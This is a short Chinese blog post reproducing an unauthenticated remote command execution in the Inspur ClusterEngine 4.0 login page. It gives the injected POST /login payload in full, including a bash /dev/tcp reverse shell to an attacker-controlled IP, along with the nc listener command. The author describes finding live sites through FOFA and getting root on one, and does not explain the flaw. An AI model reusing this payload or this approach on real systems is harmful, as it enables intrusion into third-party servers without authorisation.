# 浪潮 ClusterEngine4.0 集群管理系统前台 RCE

正当我又是在摸鱼的时候,空白( crazygod )发来了浪潮 ClusterEngine4.0 集群管理系统前台 RCE 的 payload,嗯?那我这不得直接去复现?说干就干,fofa 一波,

payload:

1
2
3
POST /login

op=login&username=1 2\',\'1\'\); `bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{反弹shellIP}%2F80%200%3E%261`

找了几个站点均抓包失败,想必是修复了,一抓包就服务器连接失败,我这脾气,直接下一个,终于到了一个可以抓包的了

首先需要 vps 开启监听 nc -lvp 3344

然后开始登陆抓包,构造 payload,go

image-20210311141348195

post 数据包如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /login HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Origin: https://ip
Connection: close
Referer: https://ip/module/login/login.html
Cookie: lang=cn

op=login&username=1%202\',\'1\'\);`bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F***.**.**.***%2F3344%200%3E%261`

发包成功获取 root 权限

image-20210311141652743

至于原理咱也不是很懂,导致命令执行,源码啥的我也没去看过,只能等空白大佬带我们分析分析了